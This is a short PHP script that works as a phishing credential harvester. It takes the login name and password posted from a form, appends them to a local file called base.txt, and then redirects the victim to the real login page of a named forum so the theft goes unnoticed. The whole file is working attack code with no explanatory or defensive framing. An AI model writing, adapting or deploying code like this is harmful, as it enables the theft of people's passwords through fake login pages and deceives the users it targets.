<?PHP
$Login = $_POST['login']; 
$Pass = $_POST['passwd']; 

$log = fopen("base.txt","a+"); 
fwrite($log,"\n $Login:$Pass \n");
fclose($log); 
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://forum.antichat.ru/login.php'></head></html>";
?>